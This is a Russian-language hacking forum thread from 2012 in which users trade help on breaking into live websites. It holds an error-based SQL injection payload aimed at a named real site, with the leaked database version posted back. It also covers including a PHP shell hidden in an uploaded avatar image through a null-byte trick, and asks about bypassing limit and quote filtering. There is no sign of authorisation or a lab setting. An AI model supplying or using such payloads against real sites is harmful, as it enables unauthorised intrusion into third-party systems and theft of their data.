ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
02.06.2012, 14:39
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от LelouchMe
Ребят, не знаю за что удалили мой пост, ведь я не просил никого ничего ломать - я попросил помочь мне, обьяснить почему не работают мои запросы, ведь я просто хочу разобраться. Впредь если мой пост удалят по несоответствию с правилами - напишите мне хотя бы в личку ответ. Спасибо заранее. На страничке http://footquest.poltava.ua/players в строке поиска скуль иньекция. Я пытался делать различные запросы но скорее всего передающиеся данные в запросе в скобочках. Как это обойти подскажите плс.
постом отправляй
s_user_nick='and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
Как и что тут менять - кури маны.
|
|
|
02.06.2012, 15:03
|
|
Новичок
Регистрация: 31.05.2012
Сообщений: 22
Провел на форуме:
6667
Репутация:
0
|
|
Сообщение от Melfis
постом отправляй
s_user_nick='and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
Как и что тут менять - кури маны.
Duplicate entry '5.0.91-community1' for key 1
бегаю по гуглу...
|
|
|
|
02.06.2012, 16:35
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
Сообщение от Cennarios
Учите матчасть Уважаемый прежде чем задавать подобные вопросы.
Во первых: Необходимо убедиться что после залития аватарки PHP код внутри файла сохранился в целостности. Собственно ,скорее всего, картинка сконвертилась или рекодилась в результате чего код `побился` и естественно не выполняется при выполнении остальных условий инклуда.
вы оказались правы. Код не сохранился, но потом перезалил картинку в другое место на форуме(проверил-код сохранился, все хорошо), но теперь пишу точно так же
Код:
vbseourl=users/38290-albums1533-1313.png
и с нулл байтом пробывал
Код:
vbseourl=users/38290-albums1533-1313.png%00.php
в итоге отображается пустая страничка. Что делать?
|
|
|
|
02.06.2012, 18:41
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от Cherep
проверил-код сохранился, все хорошо
Как образом проверили?
Сообщение от Cherep
в итоге отображается пустая страничка. Что делать?
Может все таки не сохранился? И если там мини шелл вида
, то может стоит все таки передавать еще доп. параметры в инклуд?
|
|
|
|
02.06.2012, 19:40
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
Сообщение от cat1vo
Как образом проверили?
Может все таки не сохранился? И если там мини шелл вида
, то может стоит все таки передавать еще доп. параметры в инклуд? там полноценный шелл. Проверил так: залил картинку, сохранил у себя, открыл блокнотом(код был полностью целым)
|
|
|
|
02.06.2012, 21:21
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от Cherep
там полноценный шелл. Проверил так: залил картинку, сохранил у себя, открыл блокнотом(код был полностью целым)
Начнем с того, что частенько такие функции как eval, system etc отключаются в PHP. Ищем phpinfo() - выясняем. Или еще проще - вместо eval в картинке заливаем сам phpinfo() и смотрим
|
|
|
|
03.06.2012, 01:52
|
|
Новичок
Регистрация: 31.05.2012
Сообщений: 22
Провел на форуме:
6667
Репутация:
0
|
|
я обещаю что буду искать, прежде чем задавать вопросы
Самое интересное что эту статью читал!!! К моему примеру я ответа не нашел, так как запросы выполняются через information_schema а там разрешается ТОЛЬКО чтение. Мне же интересно можно ли как-то провести запрос на изменение данных...
Konqi: тогда читайте учебник по php+mysql, все станет ясно, данный вопрос задавали многократно
|
|
|
|
04.06.2012, 19:45
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
народ, как можно вывести даннные если фильтруется limit
|
|
|
|
04.06.2012, 20:37
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266
Репутация:
53
|
|
where id=
А вообще как-то странно фильтруется, хотя чёрт его знает что там за задумка была...
|
|
|
|
05.06.2012, 18:11
|
|
Новичок
Регистрация: 31.05.2012
Сообщений: 22
Провел на форуме:
6667
Репутация:
0
|
|
Вопрос: если в GET запросе в поле login=user ввести ' то фильтрация меняет кавычку на \' то есть на странице идёт вывод Логин: user\' это как-то можно обойти...? Заранее спс...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
